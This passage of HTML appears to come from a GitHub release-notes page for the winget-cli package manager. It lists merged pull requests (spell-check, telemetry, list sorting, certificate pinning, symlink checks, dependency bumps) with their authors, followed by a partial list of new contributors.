<li>Update to spell check v26 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214249146" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6128" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6128/hovercard" href="https://github.com/microsoft/winget-cli/pull/6128">#6128</a></li>
<li>Add issue types to issue templates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/denelon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/denelon">@denelon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241777916" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6139" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6139/hovercard" href="https://github.com/microsoft/winget-cli/pull/6139">#6139</a></li>
<li>Improve MOTW error handling in download flow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214001872" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6127" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6127/hovercard" href="https://github.com/microsoft/winget-cli/pull/6127">#6127</a></li>
<li>Allow exporting to hidden files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3504005348" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5795" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5795/hovercard" href="https://github.com/microsoft/winget-cli/pull/5795">#5795</a></li>
<li>Add thread globals for downloader thread by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258013619" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6141" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6141/hovercard" href="https://github.com/microsoft/winget-cli/pull/6141">#6141</a></li>
<li>Dynamically select drive for test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214412645" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6129" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6129/hovercard" href="https://github.com/microsoft/winget-cli/pull/6129">#6129</a></li>
<li>Change how Truncation works by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259464272" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6142" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6142/hovercard" href="https://github.com/microsoft/winget-cli/pull/6142">#6142</a></li>
<li>Admin setting and group policy for configuration processor path argument by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4182457379" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6119" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6119/hovercard" href="https://github.com/microsoft/winget-cli/pull/6119">#6119</a></li>
<li>Add comments to loc strings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4278175050" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6150" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6150/hovercard" href="https://github.com/microsoft/winget-cli/pull/6150">#6150</a></li>
<li>Move XML ref ahead by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4284162176" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6154" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6154/hovercard" href="https://github.com/microsoft/winget-cli/pull/6154">#6154</a></li>
<li>Add policy for notifying authors of Localization Restriction by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288823601" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6156" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6156/hovercard" href="https://github.com/microsoft/winget-cli/pull/6156">#6156</a></li>
<li>Dont log failures to get font title info by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298573384" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6163" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6163/hovercard" href="https://github.com/microsoft/winget-cli/pull/6163">#6163</a></li>
<li>[ListCommand] Fix --source filter not restricting list output to specified source by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Madhusudhan-MSFT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Madhusudhan-MSFT">@Madhusudhan-MSFT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293334569" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6159" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6159/hovercard" href="https://github.com/microsoft/winget-cli/pull/6159">#6159</a></li>
<li>Improved manifest validations for MSI and Windows Feature names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311235441" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6170" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6170/hovercard" href="https://github.com/microsoft/winget-cli/pull/6170">#6170</a></li>
<li>Mitigate packaged preindexed source open lock convoy by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mamoreau-devolutions/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mamoreau-devolutions">@mamoreau-devolutions</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311593126" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6172" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6172/hovercard" href="https://github.com/microsoft/winget-cli/pull/6172">#6172</a></li>
<li>Optimize packaged temp ACL handling without weakening ACL repairs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mamoreau-devolutions/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mamoreau-devolutions">@mamoreau-devolutions</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311326921" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6171" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6171/hovercard" href="https://github.com/microsoft/winget-cli/pull/6171">#6171</a></li>
<li>Add telemetry event for index updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325910774" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6175" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6175/hovercard" href="https://github.com/microsoft/winget-cli/pull/6175">#6175</a></li>
<li>Make extension comparison case insensitive by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336637167" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6182" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6182/hovercard" href="https://github.com/microsoft/winget-cli/pull/6182">#6182</a></li>
<li>[Settings, ListCommand] Add sort types, settings infrastructure, and CLI arguments for output ordering by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Madhusudhan-MSFT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Madhusudhan-MSFT">@Madhusudhan-MSFT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326435705" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6177" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6177/hovercard" href="https://github.com/microsoft/winget-cli/pull/6177">#6177</a></li>
<li>Add setting for installer log file names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3512311782" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5802" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5802/hovercard" href="https://github.com/microsoft/winget-cli/pull/5802">#5802</a></li>
<li>Add JSON validation output and interop presentation model by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339735803" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6183" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6183/hovercard" href="https://github.com/microsoft/winget-cli/pull/6183">#6183</a></li>
<li>Add default installer precedence if not defined by user by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4196821929" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6123" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6123/hovercard" href="https://github.com/microsoft/winget-cli/pull/6123">#6123</a></li>
<li>Standardize PR template with emoji sections and issue types by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/denelon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/denelon">@denelon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373900925" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6207" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6207/hovercard" href="https://github.com/microsoft/winget-cli/pull/6207">#6207</a></li>
<li>Add Copilot instructions for writing specifications by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/denelon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/denelon">@denelon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373818771" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6205" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6205/hovercard" href="https://github.com/microsoft/winget-cli/pull/6205">#6205</a></li>
<li>Fix policy bot bugs and expand label coverage by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/denelon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/denelon">@denelon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373291216" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6202" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6202/hovercard" href="https://github.com/microsoft/winget-cli/pull/6202">#6202</a></li>
<li>Report DSC execution diagnostics on a timer by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368050336" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6196" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6196/hovercard" href="https://github.com/microsoft/winget-cli/pull/6196">#6196</a></li>
<li>Store provisioning mitigation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366604990" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6194" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6194/hovercard" href="https://github.com/microsoft/winget-cli/pull/6194">#6194</a></li>
<li>Add execution level to telemetry summary and logs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366651180" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6195" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6195/hovercard" href="https://github.com/microsoft/winget-cli/pull/6195">#6195</a></li>
<li>Implement sort logic for winget list output<br>
by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Madhusudhan-MSFT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Madhusudhan-MSFT">@Madhusudhan-MSFT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353698237" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6191" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6191/hovercard" href="https://github.com/microsoft/winget-cli/pull/6191">#6191</a></li>
<li>VS Code WinGet log viewer tool by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277517365" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6149" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6149/hovercard" href="https://github.com/microsoft/winget-cli/pull/6149">#6149</a></li>
<li>Bump fast-uri from 3.1.0 to 3.1.2 in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432639720" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6223" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6223/hovercard" href="https://github.com/microsoft/winget-cli/pull/6223">#6223</a></li>
<li>Update <code>configure export --all</code> for recent DSC changes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4431732649" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6222" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6222/hovercard" href="https://github.com/microsoft/winget-cli/pull/6222">#6222</a></li>
<li>Mitigate stack overflow issue by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4433123276" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6224" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6224/hovercard" href="https://github.com/microsoft/winget-cli/pull/6224">#6224</a></li>
<li>Reset default sources without dropping them by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347741443" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6187" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6187/hovercard" href="https://github.com/microsoft/winget-cli/pull/6187">#6187</a></li>
<li>Enable transitive pinning for central package management by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4441204221" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6225" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6225/hovercard" href="https://github.com/microsoft/winget-cli/pull/6225">#6225</a></li>
<li>Configuration processor auditing improvements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366411444" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6193" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6193/hovercard" href="https://github.com/microsoft/winget-cli/pull/6193">#6193</a></li>
<li>Update rest source and wingetutil interop to include 1.28 manifest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yao-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yao-msft">@yao-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4482042640" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6234" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6234/hovercard" href="https://github.com/microsoft/winget-cli/pull/6234">#6234</a></li>
<li>Move pre-check errors to post-check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488618163" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6236" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6236/hovercard" href="https://github.com/microsoft/winget-cli/pull/6236">#6236</a></li>
<li>In-proc certificate pinning validation override by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4479464952" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6233" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6233/hovercard" href="https://github.com/microsoft/winget-cli/pull/6233">#6233</a></li>
<li>Change symlink verification to avoid redirection guard policy by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4490077852" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6239" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6239/hovercard" href="https://github.com/microsoft/winget-cli/pull/6239">#6239</a></li>
<li>Bump uuid and @azure/msal-node in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497658174" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6241" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6241/hovercard" href="https://github.com/microsoft/winget-cli/pull/6241">#6241</a></li>
<li>Bump qs from 6.15.1 to 6.15.2 in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4508521780" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6246" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6246/hovercard" href="https://github.com/microsoft/winget-cli/pull/6246">#6246</a></li>
<li>Ensure portable command alias does not escape directory by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4527365695" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6251" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6251/hovercard" href="https://github.com/microsoft/winget-cli/pull/6251">#6251</a></li>
<li>Make sfs-client a vcpkg port by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499084547" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6243" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6243/hovercard" href="https://github.com/microsoft/winget-cli/pull/6243">#6243</a></li>
<li>Bump tmp from 0.2.5 to 0.2.7 in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534892375" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6252" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6252/hovercard" href="https://github.com/microsoft/winget-cli/pull/6252">#6252</a></li>
<li>Honor DSCv3 package installMode for silent and interactive by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4525632854" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6249" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6249/hovercard" href="https://github.com/microsoft/winget-cli/pull/6249">#6249</a></li>
<li>Fix triage label getting removed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537505971" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6254" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6254/hovercard" href="https://github.com/microsoft/winget-cli/pull/6254">#6254</a></li>
<li>lowercase ARM64 for vcpkg by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542807796" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6256" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6256/hovercard" href="https://github.com/microsoft/winget-cli/pull/6256">#6256</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DandelionSprout/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DandelionSprout">@DandelionSprout</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3571577317" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5845" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5845/hovercard" href="https://github.com/microsoft/winget-cli/pull/5845">#5845</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kissaki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kissaki">@Kissaki</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3543261404" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5824" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5824/hovercard" href="https://github.com/microsoft/winget-cli/pull/5824">#5824</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wmmc88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wmmc88">@wmmc88</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3997110317" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6071" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6071/hovercard" href="https://github.com/microsoft/winget-cli/pull/6071">#6071</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GrantMeStrength/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GrantMeStrength">@GrantMeStrength</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4145157508" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6110" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6110/hovercard" href="https://github.com/microsoft/winget-cli/pull/6110">#6110</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AMDphreak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AMDphreak">@AMDphreak</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111928053" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6096" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6096/hovercard" href="https://github.com/microsoft/winget-cli/pull/6096">#6096</a></li>
